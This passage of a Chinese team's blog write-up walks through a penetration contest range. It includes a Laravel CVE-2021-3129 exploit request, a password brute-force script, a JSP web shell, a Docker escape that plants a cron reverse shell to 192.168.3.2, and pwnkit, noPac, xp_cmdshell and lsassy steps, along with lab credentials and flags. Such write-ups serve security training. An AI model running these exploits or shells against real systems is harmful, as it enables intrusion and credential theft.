class="line">git@60783d084846:&#x2F;tmp&#x2F;fscan$ .&#x2F;f -np -h 192.168.30.0&#x2F;24 -o 30.txt</span><br><span class="line">.&#x2F;f -np -h 192.168.30.0&#x2F;24 -o 30.txt</span><br><span class="line"></span><br><span class="line">   ___                              _    </span><br><span class="line">  &#x2F; _ \     ___  ___ _ __ __ _  ___| | __ </span><br><span class="line"> &#x2F; &#x2F;_\&#x2F;____&#x2F; __|&#x2F; __| &#39;__&#x2F; _&#96; |&#x2F; __| |&#x2F; &#x2F;</span><br><span class="line">&#x2F; &#x2F;_\\_____\__ \ (__| | | (_| | (__|   &lt;    </span><br><span class="line">\____&#x2F;     |___&#x2F;\___|_|  \__,_|\___|_|\_\   </span><br><span class="line">                     fscan version: 1.6.3</span><br><span class="line">start infoscan</span><br><span class="line">192.168.30.19:21 open</span><br><span class="line">192.168.30.13:80 open</span><br><span class="line">192.168.30.13:22 open</span><br><span class="line">192.168.30.19:22 open</span><br><span class="line"></span><br><span class="line">alive ports len is: 4</span><br><span class="line">start vulscan</span><br><span class="line">[*] WebTitle:http:&#x2F;&#x2F;192.168.30.13      code:200 len:7      title:Laravel</span><br><span class="line">[+] InfoScan:http:&#x2F;&#x2F;192.168.30.13      [Laravel] </span><br><span class="line">已完成 1&#x2F;4 [-] ssh 192.168.30.19:22 root root@2019 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain</span><br><span class="line">已完成 3&#x2F;4 [-] ftp:&#x2F;&#x2F;192.168.30.19:21 www Passw0rd 530 Login incorrect.</span><br></pre></td></tr></table></figure><br>开了一个web服务器192.168.30.13 是laravel<br>一个ftp 192.168.30.19是一个ftp。</p>
<h3 id="搭建核心区代理"><a href="#搭建核心区代理" class="headerlink" title="搭建核心区代理"></a>搭建核心区代理</h3><p>因为每一层都是单通道，这里尝试把核心区代理到本地，方便对laravel进行渗透，其实这里只要把第二层内网区的网络代理到本地就可以到第三层<br>搭建代理逻辑如下<br>1、在第一层DMZ区的192.168.10.10上搭建一个服务器端<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./gost -L forward+ssh://admin:123456@:17979</span><br></pre></td></tr></table></figure><br>2、在第二层内网区服务器上起动客户端，让第二层的网络环境到达第一层。<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./gost -L=socks5://:7777</span><br><span class="line">./gost -L rtcp://0.0.0.0:7979/localhost:7777 -F forward+ssh://admin:123456@192.168.10.10:17979?ping=30</span><br></pre></td></tr></table></figure><br>此时在192.168.10.10上执行curl -x socks5://localhost:17979 192.168.30.13 访问正常即可。<br>结合第一层的代理，然后两层代理一起使用代理链的功能，本地就直接通30了，配置如下<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1:8888</span><br><span class="line">localhost:7979</span><br></pre></td></tr></table></figure><br>本地规则为 192.168.30.0/24 走proxychains</p>
<h3 id="Laravel-192-168-30-13"><a href="#Laravel-192-168-30-13" class="headerlink" title="Laravel : 192.168.30.13"></a>Laravel : 192.168.30.13</h3><p>laravel经典漏洞 <code>/_ignition/execute-solution debug rce CVE-2021-3129</code><br>这个靶场的这个题是今年网鼎决赛-渗透赛道的原题，本人刚好参加并且网鼎决赛现场做出。<br>，思路为<code>任意文件读获取log位置，debug打反序列化rce</code><br>任意文件读的接口如下 /api/file<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">一步步读框架文件，读到配置文件</span><br><span class="line">http:&#x2F;&#x2F;192.168.30.13&#x2F;api&#x2F;file?filename&#x3D;&#x2F;var&#x2F;www&#x2F;html&#x2F;laravel&#x2F;config&#x2F;logging.php</span><br><span class="line">找到日志文件位置logs&#x2F;tmplog&#x2F;laravel_log.log</span><br></pre></td></tr></table></figure><br>直接用网的exp，注意就是把log位置都改一下<br>例如<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">POST /_ignition/execute-solution HTTP/1.1</span><br><span class="line">Host: 192.168.30.13</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: */*</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 326</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"> &quot;solution&quot;: &quot;Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution&quot;,</span><br><span class="line"> &quot;parameters&quot;: &#123;</span><br><span class="line">  &quot;variableName&quot;: &quot;username&quot;,</span><br><span class="line">  &quot;viewFile&quot;: &quot;php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/tmplog/laravel_log.log&quot;</span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><br>在/var/www/html/laravel/public/写一个木马后可以访问，发现home目录下有flag和hint<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">(www-data:/home) $ cat flag.txt</span><br><span class="line">flag&#123;6855969e-7557-4bf4-9c8c-f5f80ee8e666&#125;</span><br><span class="line">(www-data:/home) $ cat .hint.txt</span><br><span class="line">hint: </span><br><span class="line">FTP:</span><br><span class="line">ftpuser</span><br><span class="line">SecretData_xxxx!@#</span><br><span class="line">xxxx is four-digit!</span><br></pre></td></tr></table></figure><br>这个hint就是下一步用的</p>
<h3 id="FTP-192-168-30-19"><a href="#FTP-192-168-30-19" class="headerlink" title="FTP : 192.168.30.19"></a>FTP : 192.168.30.19</h3><p>根据上面的提示 ftp密码是SecretData<em>xxxx!@#，<br>写一个脚本生成<br>&lt;!–hexoPostRenderEscape:<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#python exp.py &gt; passwd.txt</span></span><br><span class="line">password=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">10</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">10</span>):</span><br><span class="line">        <span class="keyword">for</span> m <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">10</span>):</span><br><span class="line">            <span class="keyword">for</span> z <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">10</span>):</span><br><span class="line">                print(<span class="string">&#x27;SecretData</em>&#x27;</span> + str(i)+ str(j)+ str(m)+ str(m) + <span class="string">&quot;!@#&quot;</span>)</span><br></pre></td></tr></table></figure>:hexoPostRenderEscape–&gt;</p>
<p>用超级弱口令导入用户名ftpuser，密码passwd.txt爆破<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">192.168.30.19----FTP----21----ftpuser----SecretData_7689!@#</span><br></pre></td></tr></table></figure><br>连接发现有个报错<code>500 Illegal PORT command.
425 Use PORT or PASV first.</code><br>网上找了一下为啥，尝试<code>quote PASV</code> 改成被动模式，用windows的资源管理器打开发现可以复制出来了<br>获取到flag<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;5923d77e-0765-4701-bc2d-fc1188fe953b&#125;</span><br></pre></td></tr></table></figure></p>
<h1 id="2023-05-18-day2"><a href="#2023-05-18-day2" class="headerlink" title="2023 05 18 day2"></a>2023 05 18 day2</h1><h2 id="DMZ区"><a href="#DMZ区" class="headerlink" title="DMZ区"></a>DMZ区</h2><h3 id="Tomcat-RCE"><a href="#Tomcat-RCE" class="headerlink" title="Tomcat-RCE"></a>Tomcat-RCE</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">弱口令</span><br><span class="line"></span><br><span class="line">admin:admin123!@#,有可能记错</span><br></pre></td></tr></table></figure>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;FORM METHOD=GET ACTION=<span class="string">&#x27;evil.jsp&#x27;</span>&gt;</span><br><span class="line">    &lt;INPUT name=<span class="string">&#x27;cmd&#x27;</span> type=text&gt;</span><br><span class="line">    &lt;INPUT type=submit value=<span class="string">&#x27;Run&#x27;</span>&gt;</span><br><span class="line">    &lt;/FORM&gt;</span><br><span class="line">    &lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.io.*&quot;</span> %&gt;</span><br><span class="line">    &lt;%</span><br><span class="line">       String cmd = request.getParameter(<span class="string">&quot;cmd&quot;</span>);</span><br><span class="line">       String output = <span class="string">&quot;&quot;</span>;</span><br><span class="line">       <span class="keyword">if</span>(cmd != <span class="keyword">null</span>) &#123;</span><br><span class="line">          String s = <span class="keyword">null</span>;</span><br><span class="line">          <span class="keyword">try</span> &#123;</span><br><span class="line">             Process p = Runtime.getRuntime().exec(cmd,<span class="keyword">null</span>,<span class="keyword">null</span>);</span><br><span class="line">             BufferedReader sI = <span class="keyword">new</span> BufferedReader(<span class="keyword">new</span></span><br><span class="line">    InputStreamReader(p.getInputStream()));</span><br><span class="line">             <span class="keyword">while</span>((s = sI.readLine()) != <span class="keyword">null</span>) &#123; output += s+<span class="string">&quot;&lt;/br&gt;&quot;</span>; &#125;</span><br><span class="line">          &#125;  <span class="keyword">catch</span>(IOException e) &#123;   e.printStackTrace();   &#125;</span><br><span class="line">       &#125;</span><br><span class="line">    %&gt;</span><br><span class="line">    &lt;pre&gt;&lt;%=output %&gt;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jar -cvf ../webshell.war * # 生成war包上传</span><br></pre></td></tr></table></figure>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">user1:asd123 #ssh口令</span><br><span class="line"><span class="meta">#</span><span class="bash"> 登陆上去为user1用户需要提权，用户目录下应该有一个poc.c文件，pwnkit提权:CVE-2021-4034</span></span><br><span class="line">gcc poc.c -o poc, ./poc</span><br></pre></td></tr></table></figure>
<h2 id="内网"><a href="#内网" class="headerlink" title="内网"></a>内网</h2><h3 id="docker容器"><a href="#docker容器" class="headerlink" title="docker容器"></a>docker容器</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> tomcat进去应该能翻到一个ssh口令</span></span><br><span class="line">root:deploy-20231212</span><br><span class="line"></span><br><span class="line"><span class="meta">#</span><span class="bash">端口:10022</span></span><br><span class="line">用这个口令去连内网中存在这个端口的服务器，上去是docker容器</span><br><span class="line"></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="comment"># 特权容器逃逸操作</span></span></span><br><span class="line">fdisk -l # 查看磁盘文件</span><br><span class="line">mkdir /tmp/data #新建临时文件</span><br><span class="line">mount /dev/vda1 /tmp/data # 挂着宿主机目录</span><br><span class="line">echo &#x27;* * * * * bash -i &gt;&amp; /dev/tcp/192.168.3.2/8888 0&gt;&amp;1&#x27; &gt;&gt; /tmp/data/var/spool/cron/crontabs/root # 写入定时文件反弹shell</span><br><span class="line"></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="comment"># 逃逸成功后，在宿主机上查看另外一个容器,可以发现一个数据库密码</span></span></span><br><span class="line">sa:_H66rCce2psF4D5E8v2B6x3:master</span><br></pre></td></tr></table></figure>
<h3 id="SqlServerRCE"><a href="#SqlServerRCE" class="headerlink" title="SqlServerRCE"></a>SqlServerRCE</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sa:_H66rCce2psF4D5E8v2B6x3:master # 用户名:密码:数据库</span><br></pre></td></tr></table></figure>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> kali中 安装impacket的包, 里面有这个模块</span></span><br><span class="line">impacket-mssqlclient -db master sa:_H66rCce2psF4D5E8v2B6x3@192.168.153.147 #链接远程数据库</span><br><span class="line"></span><br><span class="line"><span class="meta">#</span><span class="bash"><span class="comment"># 按照工具提示，启动一下xp_cmdshell,就可以执行命令了</span></span></span><br></pre></td></tr></table></figure>
<h2 id="核心内网"><a href="#核心内网" class="headerlink" title="核心内网"></a>核心内网</h2><h3 id="NoPAC-RCE"><a href="#NoPAC-RCE" class="headerlink" title="NoPAC-RCE"></a>NoPAC-RCE</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 在sqlserver服务器中翻到的账户密码，直接用nopac来打，直接获得一个shell</span></span><br><span class="line">python3 ./noPac.py lab.local/test:&#x27;1qaz@WSX&#x27; -dc-ip 192.168.153.148 -use-ldap -shell --impersonate administrator</span><br></pre></td></tr></table></figure>
<h3 id="hash"><a href="#hash" class="headerlink" title="hash"></a>hash</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 打完NoPAC-RCE后, 可以翻到一个密码提示文件</span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 最终密码为: user:LAB2022!@<span class="comment">#_summer</span></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 在终端中输入注意用<span class="string">&#x27;\&#x27;</span>来转义一下<span class="string">&#x27;!&#x27;</span>, 返回到<span class="built_in">hash</span>就能其中一个就是flag, 会有flag字样提示的</span></span><br><span class="line">cme smb 192.168.153.149 -u &quot;user&quot; -p &quot;LAB2022\!@#_summer&quot; -M lsassy </span><br></pre></td></tr></table></figure>
  </article>
  <aside class="table-content" id="site-toc">
  <div class="table-content-title">
    <i class="fa fa-arrow-right fa-lg" id="site-toc-hide-btn"></i>
    <span>目录</span>
  </div>
  <div class="table-content-main">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#2023-05-17-day1"><span class="toc-text">2023 05 17 day1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81DMZ%E5%8C%BA"><span class="toc-text">1、DMZ区</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%A5%E5%8F%A31%EF%BC%9A172-30-38-150-80-bluecms"><span class="toc-text">入口1：172.30.38.150:80 bluecms</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%A5%E5%8F%A32%EF%BC%9A172-30-38-151-3306"><span class="toc-text">入口2：172.30.38.151:3306</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E5%86%85%E7%BD%91%E5%8C%BA"><span class="toc-text">2、内网区</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E5%8C%BAgitlab-192-168-20-19-8080"><span class="toc-text">内网区gitlab:192.168.20.19:8080</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E5%8C%BAwindows-192-168-20-15"><span class="toc-text">内网区windows:192.168.20.15</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E6%A0%B8%E5%BF%83%E5%86%85%E7%BD%91%E5%8C%BA"><span class="toc-text">3、核心内网区</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E6%A0%B8%E5%BF%83%E5%8C%BA%E4%BB%A3%E7%90%86"><span class="toc-text">搭建核心区代理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Laravel-192-168-30-13"><span class="toc-text">Laravel : 192.168.30.13</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FTP-192-168-30-19"><span class="toc-text">FTP : 192.168.30.19</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2023-05-18-day2"><span class="toc-text">2023 05 18 day2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#DMZ%E5%8C%BA"><span class="toc-text">DMZ区</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Tomcat-RCE"><span class="toc-text">Tomcat-RCE</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E7%BD%91"><span class="toc-text">内网</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#docker%E5%AE%B9%E5%99%A8"><span class="toc-text">docker容器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SqlServerRCE"><span class="toc-text">SqlServerRCE</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A0%B8%E5%BF%83%E5%86%85%E7%BD%91"><span class="toc-text">核心内网</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NoPAC-RCE"><span class="toc-text">NoPAC-RCE</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hash"><span class="toc-text">hash</span></a></li></ol></li></ol>
  </div>
</aside>
  
    <aside class="passage-copyright">
      <div>本文作者: SUers</div>
      
        <div>
          原文链接: 
          <a href="" target="_blank">https://team-su.github.io/passages/2023-05-17%E8%B4%B5%E9%98%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%B2%BE%E8%8B%B1%E5%AF%B9%E6%8A%97%E8%B5%9B/</a>
        </div>
      
      <div>
        版权声明: 本博客所有文章除特别声明外, 均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议. 转载请注明出处!
      </div>
    </aside>
  
  
    <div class="passage-tags">
     
      <a href="/tags/%E6%B8%97%E9%80%8F/"><i class="fa fa-tags"></i>渗透</a>
    
    </div>
  
</div>

    </main>
    
    <div class="site-footer-wrapper">
  <footer class="site-footer">
    
    <div class="site-footer-info">
      <i class="fa fa-clock-o"></i> 本站已稳定运行<span id="site-time"></span>
    </div>
    
    
      <div class="site-footer-info">
        <i class="fa fa-at"></i> Email: suers_xctf@126.com
      </div>
    
    <div class="site-footer-info">
      <i class="fa fa-copyright"></i> 
      2019 <a href="https://github.com/dongyuanxin/theme-ad/" target="_blank">Theme-AD</a>.
      Created by <a href="https://godbmw.com/" target="_blank">GodBMW</a>.
      All rights reserved.
    </div>
  </footer>
</div>
    <div id="site-layer" style="display:none;">
  <div class="site-layer-content">
    <div class="site-layer-header">
      <span class="site-layer-header-title" id="site-layer-title"></span>
      <i class="fa fa-close" id="site-layer-close"></i>
    </div>
    <div class="site-layer-body" id="site-layer-container">
      <div class="site-layer-input" id="site-layer-search" style="display: none;">
        <div class="site-layer-input-choose">
          <a href="javascript:void(0);" title="Change Search Engine">Google</a>
        </div>
        <input type="text">
        <i class="fa fa-search"></i>
      </div>
      
      <div id="site-layer-welcome" style="display:none;"></div>
    </div>
  </div>
</div>
    

<div class="bottom-bar">
  <div class="bottom-bar-left">
    <a href="javascript:void(0);" data-enable="false">
      <i class="fa fa-arrow-left"></i>
    </a>
    <a href="/passages/2023-08-19Wmctf/" data-enable="true">
      <i class="fa fa-arrow-right"></i>
    </a>
  </div>
  <div class="bottom-bar-right">
    <a href="javascript:void(0);" data-enable="true" id="site-toc-show-btn">
      <i class="fa fa-bars"></i>
    </a>
    
    <a href="javascript:void(0);" id="site-toggle-share-btn">
      <i class="fa fa-share-alt"></i>
    </a>
    
    <a href="javascript:void(0);" id="back-top-btn">
      <i class="fa fa-chevron-up"></i>
    </a>
  </div>
</div>
    <div id="share-btn">
  
  
  
  
  
</div>
    
  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-112937997-3"></script>
  <script async>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'UA-112937997-3');
  </script>






    
  </body>
</html>